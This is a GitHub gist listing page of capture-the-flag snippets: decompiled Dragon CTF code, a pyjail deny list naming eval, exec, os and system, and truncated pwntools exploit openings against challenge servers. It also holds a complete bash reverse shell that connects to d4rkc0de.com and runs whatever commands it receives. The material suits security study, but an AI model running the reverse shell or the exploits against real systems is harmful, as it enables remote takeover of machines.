lionaneesh
/ rms-fixed.c
Created
September 23, 2019 15:45
rms-fixed, source code from Dragon CTF 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void *__fastcall fetch(void *url_1) | |
| { | |
| int v1; // eax | |
| char *v2; // rax | |
| __int64 v3; // rdx | |
| int *v4; // rax | |
| void *dest; // ST78_8 | |
| uint16_t port_network; // [rsp+1Ah] [rbp-116h] | |
| int portnumber; // [rsp+1Ch] [rbp-114h] | |
| char *hostname; // [rsp+20h] [rbp-110h] |
lionaneesh
/ rms-fixed-make_request.c
Created
September 23, 2019 16:03
rms-fixed, make_request, from DragonCTF 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| signed __int64 __fastcall make_request(const struct sockaddr *a1, socklen_t a2, char *a3, char *a4, void **a5, _QWORD *a6) | |
| { | |
| int *v6; // rax | |
| signed __int64 result; // rax | |
| int *v8; // rax | |
| size_t v9; // rax | |
| int *v10; // rax | |
| size_t v11; // rax | |
| int *v12; // rax | |
| int *v13; // rax |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/python3 | |
| #-*- coding:utf-8 -*- | |
| def main(): | |
| print("Hi! Welcome to pyjail!") | |
| print("========================================================================") | |
| print(open(__file__).read()) | |
| print("========================================================================") | |
| print("RUN") | |
| text = input('>>> ') | |
| for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']: |
lionaneesh
/ solve_dragon.py
Created
November 18, 2019 10:35
Solve the Dragon (rookiss) from pwnable.kr
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #r = process('./dragon') | |
| r = remote("pwnable.kr", 9004) | |
| win = p32(0x08048dbf) | |
| def select_priest(): | |
| print r.recvuntil("[ 2 ] Knight") | |
| r.send("1\n") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import re | |
| #r = process("/home/horcruxes/horcruxes") | |
| r = remote('0.0.0.0', 9032) | |
| print r.recvuntil("Select Menu:") | |
| r.send("123\n") | |
| print r.recvuntil("earned? : ") | |
| a = p32(0x809fe4b) | |
| b = p32(0x809fe6a) | |
| c = p32(0x809fe89) |
lionaneesh
/ emu_2_parse.py
Created
December 23, 2019 10:57
Solution for EMU 2.0, X-Mas CTF 2019, parsing a custom 8bit RISC micro-processor.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| state = {'a': 0, 'pc': 0x100} | |
| mem = [] | |
| blocked_addrs = [] | |
| def parse_opcode(opcode, arg): | |
| global state | |
| global mem | |
| global blocked_addrs | |
| jumped = False | |
| x = int(arg, base=16) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| exec 5<>/dev/tcp/d4rkc0de.com/2334 | |
| cat <&5 | while read line; do $line 2>&5 >&5; done |
lionaneesh
/ gentooinstall.sh
Last active
April 1, 2020 13:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| NAME="Gentoo Install" | |
| CODENAME="gentooinstall" | |
| COPYRIGHT="Copyright (C) 2016 Nathan Shearer" | |
| LICENSE="GNU General Public License 2.0" | |
| VERSION="2.0.0.0" | |
| function gentooinstall_architecture | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote('jh2i.com', 50016) | |
| #r = process('./saas') | |
| def syscall(a2): | |
| print ("syscall", a2) | |
| for a in a2: | |
| txt = r.recv(timeout=2).strip() | |
| print (txt.strip(), len(txt)) | |
| r.sendline(str(a)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r = remote('jh2i.com', 50016) | |
| #r = process('./saas') | |
| def syscall(a2): | |
| print ("syscall", a2) | |
| for a in a2: | |
| txt = r.recv(timeout=2).strip() | |
| print (txt.strip(), len(txt)) | |
| r.sendline(str(a)) |